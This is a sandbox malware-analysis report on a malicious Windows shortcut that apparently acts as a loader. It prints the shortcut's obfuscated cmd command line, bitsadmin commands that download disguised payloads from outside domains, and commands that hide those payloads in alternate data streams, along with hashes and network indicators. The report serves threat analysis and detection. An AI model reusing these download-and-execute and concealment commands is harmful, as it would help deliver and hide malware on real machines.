File name:

Download_Concluido.lnk

Full analysis: https://app.any.run/tasks/3cdcf6cd-3512-4e7d-94a2-8957afba9a28
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: October 14, 2019, 16:13:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has command line arguments, Icon number=16, Archive, ctime=Tue Jul 16 21:12:16 2019, mtime=Tue Jul 16 21:12:16 2019, atime=Tue Jul 16 21:12:16 2019, length=236032, window=hidenormalshowminimized
MD5:

BC5101705E9BBE3A586C8CAD39F80D24

SHA1:

B4A6DAC03431FFB1B6DEEE71C3DCB9389D0A7792

SHA256:

73D68EA654A544CBC1DDBB02BFE0612D1EBBF24C5CB59CD15D7684D5E799B168

SSDEEP:

24:8XKoJ64w10uaOAGuYiqXI1XZGLvx7rf8S28qv+RrgexipXuyNv4o0c5vZ4Od2SdF:8s4pDUvx7rf/28qqiraoDx4OHva48

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes settings of System certificates

      • WScript.exe (PID: 2136)
    • Uses BITADMIN.EXE for downloading application

      • WScript.exe (PID: 2136)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2916)
      • WScript.exe (PID: 2136)
    • Application launched itself

      • cmd.exe (PID: 2916)
    • Executes scripts

      • explorer.exe (PID: 4040)
    • Executed via COM

      • explorer.exe (PID: 4040)
    • Adds / modifies Windows certificates

      • WScript.exe (PID: 2136)
    • Creates files in the user directory

      • WScript.exe (PID: 2136)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, Description, CommandArgs, IconFile, Unicode, ExpString
FileAttributes: Archive
CreateDate: 2019:07:17 00:12:16+02:00
AccessDate: 2019:07:17 00:12:16+02:00
ModifyDate: 2019:07:17 00:12:16+02:00
TargetFileSize: 236032
IconIndex: 16
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: cmd.exe
DriveType: Fixed Disk
VolumeLabel: -
LocalBasePath: C:\Windows\System32\cmd.exe
Description: nuyf
CommandLineArguments: /V /D /c "sEt DLL=%wMUARindMUARir%MUAR\eXMUARPLoMUARReRMUAR /cMUAR,&&SeT BXD=GeBJABtOBJABbjeBJABct(BJAB'scBJABriBJABptBJAB:hBJABttpBJABs:&&SEt dIixe4j=HLGHLG7lpncg4qnm8khb7p.02ee950efa7e48.onlineHLG?08HLG') 2>&1 && sET/^p ESxvd7i="%BXD:BJAB=%%dIixe4j:HLG=/%" <nul > %Tmp%\66dJmr4.Js 2>&1 2>&1|CAll %DLL:MUAR=% %TMP%\66dJmr4.jS 2>&1|e^xi^T"
IconFileName: %SystemRoot%\system32\SHELL32.dll
MachineID: ideia_vmxx
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
69
Monitored processes
20
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs explorer.exe no specs explorer.exe no specs wscript.exe bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs cmd.exe no specs bitsadmin.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
492C:\Windows\system32\cmd.exe /S /D /c" CAll %DLL:MUAR=% C:\Users\admin\AppData\Local\Temp\66dJmr4.jS 2>&1"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
992"C:\Windows\System32\bitsadmin.exe" /transfer 27009 /priority foreground https://obeisantsponge.cf/08/landoqeahjkygx.gif.zip C:\Users\Public\Libraries\trust\landoqeahjkygx.gifC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
1012C:\Windows\system32\cmd.exe /S /D /c" exiT"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1012"C:\Windows\System32\bitsadmin.exe" /transfer 29942 /priority foreground https://obeisantsponge.cf/08/landoqeahjkydwwn.gif.zip C:\Users\Public\Libraries\trust\landoqeahjkydwwn.gifC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\imm32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\cmd.exe
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
1252C:\Windows\eXPLoReR /c, C:\Users\admin\AppData\Local\Temp\66dJmr4.jS C:\Windows\explorer.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\explorer.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
1416"C:\Windows\System32\bitsadmin.exe" /transfer 24563 /priority foreground https://obeisantsponge.cf/08/landoqeahjkyc.jpg.zip C:\Users\Public\Libraries\trust\landoqeahjkyc.jpgC:\Windows\System32\bitsadmin.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
0
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msctf.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\conhost.exe
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
1552"C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\trust\landoqeahjkyg.gif" > "C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyg.gif"&&erase "C:\Users\Public\Libraries\trust\landoqeahjkyg.gif"C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2136"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\66dJmr4.Js" C:\Windows\System32\WScript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2208"C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\trust\landoqeahjkya.jpg" > "C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkya.jpg"&&erase "C:\Users\Public\Libraries\trust\landoqeahjkya.jpg"C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2416"C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\trust\landoqeahjkyc.jpg" > "C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyc.jpg"&&erase "C:\Users\Public\Libraries\trust\landoqeahjkyc.jpg"C:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
323
Read events
278
Write events
44
Delete events
1

Modification events

(PID) Process:(4040) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.Js\OpenWithProgids
Operation:writeName:JSFile
Value:
(PID) Process:(4040) explorer.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(4040) explorer.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
Operation:writeName:@C:\Windows\System32\wshext.dll,-4511
Value:
Open &with Command Prompt
(PID) Process:(4040) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(4040) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2136) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2136) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2136) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(2136) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(2136) WScript.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WScript_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
Executable files
0
Suspicious files
6
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
2208cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkya.jpgbinary
MD5:
SHA256:
3972cmd.exeC:\Users\admin\AppData\Local\Temp\66dJmr4.Jstext
MD5:
SHA256:
2440cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyb.jpgbinary
MD5:
SHA256:
3924cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkydwwn.gifbinary
MD5:
SHA256:
2136WScript.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\7lpncg4qnm8khb7p_02ee950efa7e48_online[1].txtxml
MD5:
SHA256:
1552cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyg.gifbinary
MD5:
SHA256:
3500cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkydx.gifbinary
MD5:
SHA256:
2416cmd.exeC:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyc.jpgbinary
MD5:
SHA256:
2136WScript.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@02ee950efa7e48[1].txttext
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
2
Threats
2

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2136
WScript.exe
104.24.126.167:443
7lpncg4qnm8khb7p.02ee950efa7e48.online
Cloudflare Inc
US
unknown
104.27.147.123:443
obeisantsponge.cf
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
7lpncg4qnm8khb7p.02ee950efa7e48.online
  • 104.24.126.167
  • 104.24.127.167
suspicious
obeisantsponge.cf
  • 104.27.147.123
  • 104.27.146.123
unknown

Threats

PID
Process
Class
Message
1080
svchost.exe
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .cf Domain
Potentially Bad Traffic
ET INFO Suspicious Domain (*.cf) in TLS SNI
No debug info